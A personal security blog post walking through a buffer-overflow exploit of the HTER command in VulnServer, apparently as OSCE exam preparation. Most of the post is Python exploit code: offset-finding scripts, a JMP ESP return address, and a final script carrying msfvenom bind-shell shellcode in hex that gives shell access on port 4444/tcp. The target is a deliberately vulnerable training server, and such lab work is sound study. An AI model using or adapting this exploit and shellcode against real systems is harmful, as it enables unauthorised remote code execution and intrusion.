Capt. Meelo

An infosec guy who's constantly seeking for knowledge.

[VulnServer] Exploiting HTER Command using Hex Characters Only

01 Jul 2018 » exploitdev, osceprep

I used the following skeleton for the exploitation of the HTER command.

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

buffer = "A"*3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

Sending 3000 bytes of A”s caused a crash to the application. However, EIP was overwritten with AAAAAAAA instead of 41414141. I’ve sent different strings as buffers to further observed the behavior of the application. Based on it, I observed that the buffer was somehow being converted into hex bytes as opposed to ASCII. Crash

The unique strings generated by the command !mona pc didn’t work since the buffer was being converted into hex bytes. So, I used the “Binary Tree Analysis” method to determine the offset. Instead of sending 3000 A’s, I spent 1500 A’s and 1500 B’s.

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

buffer = "A"*1500
buffer += "B"*1500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

Since EIP was overwritten with BBBBBBBB, I knew that the bytes resided in the 2nd half of the buffer - the 1500 bytes of B’s. Offset1

Next, I changed the 1500 B’s into 750 B’s and 750 C’s.

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

buffer = "A"*1500
buffer += "B"*750
buffer += "C"*750

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

Again, EIP was still overwritten with B’s. Offset2

I repeated the same process a few times until I discovered that the offset was 2040 bytes. The following shows the updated code. (Note: I used 8 B’s instead of 4 only since the buffer was being converted into hex bytes.)

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

buffer = "A"*2040
buffer += "BBBBBBBB"
buffer += "C"*(3000-len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

Running the new code resulted into EIP being overwritten with 8 B’s. As seen also, ESP was located right after the buffer of B’s. Offset3

To redirect the execution to the buffer of C’s, I used !mona jmp -r esp -m ‘essfunc.dll’ to find an address containing a JMP ESP instruction. For this, I used the first address, which was 0x625011AF. JMP ESP

I then modified the code to the following.

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

buffer = "A"*2040
buffer += "AF115062"    # JMP ESP from essfunc.dll
buffer += "C"*(3000-len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

As seen, the redirection worked. Buffer of C's

The next thing that I did was generate a shellcode in hex format. MSFvenom

The following shows the final exploit code.

#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.129"
port = 9999

# msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f hex
# Payload size: 355 bytes
shellcode = "ba4644ed07ddc6d97424f45e29c9b15383eefc31560e03104a0ff260ba4dfd983b32777d0a72e3f63d42675ab229254e415fe261e2ead44cf34724cf779a792f49558c2e8e887d6247c6d092ec92e819be3369fe77355851036c7a50c004334a05208de1fdde0c23cc1fa20ae0edba4bc70dc9a53bb3ca72416f5e60e1e4f84c13289e071f85d44f3c1838e43891bf2ac9e19bee91b282b77f14baa7dfc91eacf21e13ef9ad31e0f5b7c287c692382eac1ac0ced2687e961d9280aa81e7c5ac2b7fd31123728af1a9e83d2e760745347099e5cb829a1b6d1c25c39cc4ee8df847ebc4830bd9b40a7bec9f84ff61b3e70070e68e68c5dac17934b844004014523b4164cd355840b2313b58374740bda106832740671a2bf82ae17410b2223651bfaac214f52fbff3914554e93ce0a187396609b0597ac6de92619281686cdbc6ffa6d42babe8ea16ecb267cfb762b7fd6b552fcd245a11c9740ed9a44397e4f6aee7f5a"

buffer = "A"*2040
buffer += "AF115062"    # JMP ESP from essfunc.dll
buffer += "90"*16       # nopsled
buffer += shellcode
buffer += "C"*(3000-len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("HTER 0" + buffer)
print s.recv(1024)
s.close()

Running this caused the target machine to spawn a “listening” port on 4444/tcp. Bind

Connecting to this port allowed me to have a shell access. Shell